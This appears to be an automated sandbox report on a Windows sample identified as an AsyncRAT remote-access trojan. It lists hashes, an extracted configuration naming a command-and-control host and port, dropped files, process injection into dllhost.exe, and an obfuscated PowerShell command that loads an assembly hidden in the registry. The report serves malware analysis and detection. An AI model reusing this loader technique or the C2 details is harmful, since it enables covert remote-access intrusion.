Analysis
-
max time kernel
30s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
13-07-2024 04:22
Static task
static1
Behavioral task
behavioral1
Sample
batch.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
batch.exe
Resource
win10v2004-20240709-en
General
-
Target
batch.exe
-
Size
194KB
-
MD5
5cd0d1cc05f646037164ab9fceacf995
-
SHA1
1eab49d606689ac01f2423441a553ec829854a65
-
SHA256
342fda83ad4d56696ec349715775d5b6f5b3bbb46e57918b9e7b458c75be2a87
-
SHA512
4b755c993531a95cf51362607b78b0fee15ffe133a0951d1e9f18582d8092c99a7fbe30679d8b2279d5cecfeb09291e4e053dd7bacd884a644976193348ba37e
-
SSDEEP
3072:96Up6fIk/wZypP/9F/ix/A9wXnDLn1mFbTYGtdGt3WzZb29b/zSLpSoSE:96Wd6/9FO/AmL1mFbckdGtmzYR/zAc
Malware Config
Extracted
asyncrat
1.0.7
!DEAD CODE TOOL'S
chapter-designated.gl.at.ply.gg:27729
!DEADCODEMutex_lm.deadcode
-
delay
3
-
install
false
-
install_file
svchost.exe
-
install_folder
%AppData%
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2900 created 432 2900 powershell.EXE 5 -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0009000000016c77-13.dat family_asyncrat -
Executes dropped EXE 2 IoCs
pid Process 2752 DeadSecRootKit.exe 2844 DeadClient.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\DeadClient.exe batch.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\System32\DeadSecRootKit.exe batch.exe File opened for modification C:\Windows\System32\DeadSecRootKit.exe batch.exe File created C:\Windows\System32\DeadClient.exe batch.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2900 set thread context of 2760 2900 powershell.EXE 36 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 4097a25cdcd4da01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2900 powershell.EXE 2900 powershell.EXE 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe 2760 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1196 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2532 batch.exe Token: SeDebugPrivilege 2900 powershell.EXE Token: SeDebugPrivilege 2900 powershell.EXE Token: SeDebugPrivilege 2760 dllhost.exe Token: SeShutdownPrivilege 1196 Explorer.EXE Token: SeAuditPrivilege 864 svchost.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 2532 wrote to memory of 2752 2532 batch.exe 31 PID 2532 wrote to memory of 2752 2532 batch.exe 31 PID 2532 wrote to memory of 2752 2532 batch.exe 31 PID 2532 wrote to memory of 2752 2532 batch.exe 31 PID 2532 wrote to memory of 2844 2532 batch.exe 32 PID 2532 wrote to memory of 2844 2532 batch.exe 32 PID 2532 wrote to memory of 2844 2532 batch.exe 32 PID 2876 wrote to memory of 2900 2876 taskeng.exe 34 PID 2876 wrote to memory of 2900 2876 taskeng.exe 34 PID 2876 wrote to memory of 2900 2876 taskeng.exe 34 PID 2900 wrote to memory of 2760 2900 powershell.EXE 36 PID 2900 wrote to memory of 2760 2900 powershell.EXE 36 PID 2900 wrote to memory of 2760 2900 powershell.EXE 36 PID 2900 wrote to memory of 2760 2900 powershell.EXE 36 PID 2900 wrote to memory of 2760 2900 powershell.EXE 36 PID 2900 wrote to memory of 2760 2900 powershell.EXE 36 PID 2900 wrote to memory of 2760 2900 powershell.EXE 36 PID 2900 wrote to memory of 2760 2900 powershell.EXE 36 PID 2900 wrote to memory of 2760 2900 powershell.EXE 36 PID 2760 wrote to memory of 432 2760 dllhost.exe 5 PID 2760 wrote to memory of 476 2760 dllhost.exe 6 PID 2760 wrote to memory of 488 2760 dllhost.exe 7 PID 2760 wrote to memory of 496 2760 dllhost.exe 8 PID 2760 wrote to memory of 608 2760 dllhost.exe 9 PID 2760 wrote to memory of 676 2760 dllhost.exe 10 PID 2760 wrote to memory of 748 2760 dllhost.exe 11 PID 2760 wrote to memory of 812 2760 dllhost.exe 12 PID 2760 wrote to memory of 864 2760 dllhost.exe 13 PID 2760 wrote to memory of 984 2760 dllhost.exe 15 PID 2760 wrote to memory of 272 2760 dllhost.exe 16 PID 2760 wrote to memory of 328 2760 dllhost.exe 17 PID 2760 wrote to memory of 1072 2760 dllhost.exe 18 PID 2760 wrote to memory of 1112 2760 dllhost.exe 19 PID 2760 wrote to memory of 1160 2760 dllhost.exe 20 PID 2760 wrote to memory of 1196 2760 dllhost.exe 21 PID 2760 wrote to memory of 1440 2760 dllhost.exe 23 PID 2760 wrote to memory of 1692 2760 dllhost.exe 24 PID 2760 wrote to memory of 540 2760 dllhost.exe 25 PID 2760 wrote to memory of 2280 2760 dllhost.exe 26 PID 2760 wrote to memory of 2452 2760 dllhost.exe 27 PID 2760 wrote to memory of 1264 2760 dllhost.exe 30 PID 2760 wrote to memory of 2844 2760 dllhost.exe 32 PID 2760 wrote to memory of 2876 2760 dllhost.exe 33 PID 2760 wrote to memory of 2900 2760 dllhost.exe 34 PID 2760 wrote to memory of 2784 2760 dllhost.exe 35
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a85d6e6d-3698-4657-9236-8f295fe5c8db}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2760
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:608
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1440
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:540
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵PID:1264
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:676
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵PID:748
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:812
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1160
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:864 -
C:\Windows\system32\taskeng.exetaskeng.exe {584905D7-A862-426D-BA77-A39E2905DB35} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+'W'+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](68)+''+[Char](101)+'ad'+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2900
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:984
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:272
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:328
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1072
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1112
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1692
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2280
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2452
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:488
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1196 -
C:\Users\Admin\AppData\Local\Temp\batch.exe"C:\Users\Admin\AppData\Local\Temp\batch.exe"2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\System32\DeadSecRootKit.exe"C:\Windows\System32\DeadSecRootKit.exe"3⤵
- Executes dropped EXE
PID:2752
-
-
C:\Windows\System32\DeadClient.exe"C:\Windows\System32\DeadClient.exe"3⤵
- Executes dropped EXE
PID:2844
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "138669702-16829183118572019522638494791906237127841555697-2136218637-669668812"1⤵PID:2784
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
63KB
MD5f33086a386dd46cf6148beb6e6a6214b
SHA11235a154fdcd0e2724768c822778a9ba044bd47e
SHA2563adccf5f76f998c0481d3e4d8a6535b6f27aa4fc30d213df66aa6256d891a08b
SHA512677ac48b6b5cbe3465a6533af00d877f610b91ee2aa2c0e505c9d711b831b57cbbfdd73681b699065d3e5e89907e87ad9b5ce20e58c741a826237e3dcefda251
-
Filesize
151KB
MD5b8479a23c22cf6fc456e197939284069
SHA1b2d98cc291f16192a46f363d007e012d45c63300
SHA25618294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f
SHA512786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4